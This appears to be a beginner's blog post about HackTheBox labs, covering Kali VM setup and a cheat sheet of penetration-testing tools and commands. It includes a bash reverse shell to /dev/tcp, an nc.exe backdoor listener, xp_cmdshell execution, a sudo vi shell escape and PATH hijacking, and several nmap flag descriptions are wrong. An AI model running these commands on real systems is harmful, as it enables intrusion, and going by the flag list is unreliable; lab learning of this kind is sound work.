Start!HackTheBox

发表于 更新于 分类于

It`s an introduction about how I learned at HackTheBox.

Start Point

It`s a good start to start hacking from HackTheBox.
First of all, you need to prepare your Kali Linux or other Linux Distro.
Here I choose Kali Linux with Hyper-V on Windows 11.
Start with the following steps:

  1. Install Hyper-V on Windows.
  2. Open Hyper-V Manager.
  3. Create a new VM.
  4. Use the following settings():

    Tips: Some of the settings are dependent on your hardware. Other settings can use the default.

    • Name: HackTheBox(or other names you want)
    • OS: Kali Linux
    • Memory: 4GB
    • CPU: 4
    • Network:
      • Type: Outbound

Start hacking

NMAP

nmap is a powerful tool for scanning the network.

usage:

  • nmap -sV -sC -sS target_ip

some common usage:

  • -sV for version detection.
  • -sC for OS detection.
  • -sS for service detection.
  • -sF for fast scan.
  • -sO for OS fingerprinting.

smbclient

smbclient is a tool for connecting to SMB servers.

usage:

  • smbclient -L target_ip
  • smbclient -L target_ip -U username
  • smbclient ////target_ip/share_name -U username

some common usage:

  • -L for list shares.
  • -N for nopassword.

some common commands:

  • get for downloading files.

gobuster

gobuster is a tool for finding files on a web server.

usage:

  • gobuster dir -u http://target_ip/ -w wordlist.txt

some common usage:

  • -u for target URL.
  • -w for wordlist.

some common commands:

  • dir for directory scan.

Impacket

impacket-mssqlclient

impacket-mssqlclient is a tool for connecting to MSSQL servers with some extra features.

like enable xp_cmdshell.

usage:

  • impacket-mssqlclient username@target_ip -port 1433

some usage:

  • xp_cmdshell "powershell -c pwd"

impacket-psexec

impacket-psexec is a tool for executing commands on a remote Windows host.

usage: impacket-psexec {USERNAME}}@{TARGET_IP}

nc.exe

nc.exe is a tool for listening on a port. It is a winodws version of netcat. you can use this tool to open a backdoor.

usage: nc.exe -e cmd.exe -l -p port

Burp Suite

Burp Suite Proxy

Burp Suite Proxy is a tool for intercepting HTTP traffic.

Burp Suite Target

It can help you make site map.

Just need set proxy for your browser, visit the target site, and you will see the site map.

phpshell

phpshell is a tool for executing PHP code on a remote server.

In kali it contained in /usr/share/webshells/.

John the Ripper aka john

John the Ripper is a free password cracking software tool.

First, transfer the target file to a hash file.zip2john target_file.zip > target_file.hash

Then, use the following command to crack the hash file:
john --wordlist=wordlist.txt target_file.hash

hashid

hashid is a tool for identifying the hash type.

hashcat

hashcat is a tool for cracking hashes.
hashcat -a 0 -m 0 target_file.hash wordlist.txt

sqlmap

sqlmap is a tool for automating SQL injection.

some common usage:

  • -u: target URL.
  • --cookie: cookie.
  • --os-shell: open a shell.

To stabilize the target, you can use the following command:bash -c "bash -i >& /dev/tcp/target_ip/port 0>&1"

Don`t forget to open nc in the target port.

Then you can use the following command to stabilize the shell:

1
2
3
4
5
python3 -c 'import pty;pty.spawn("/bin/bash")'
CTRL+Z
stty raw -echo
fg
export TERM=xterm

Get root privilege

vi

vi is a text editor.But it can open a shell.

If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

sudo vi -c ':!/bin/sh' /dev/null

if it`s not work, try:

1
2
3
vi
:set shell=/bin/sh
:shell

Common knowledge in Linux when penetration testing

  1. Quick password check:
    cat * | grep -i passw*

  2. In order to have a functional shell though we can issue the following:
    python3 -c 'import pty;pty.spawn("/bin/bash")'

  3. Check User: cat /etc/passwd

  4. Check file belongs to group: find / -group {groupname} 2>/dev/null

  5. Check file privileges: ls -la {filepath} && file {filepath}

  6. Commonly noted as SUID (Set owner User ID), the special permission for the user access level has a single function: A file with SUID always executes as the user who owns the file, regardless of the user passing the command. If the file owner doesn’t have to execute permissions, then use an uppercase S here.

  7. Add executable file to PATH. When the target is executed, it will search the PATH for your program.
    Like: export PATH=$PATH:/tmp/bin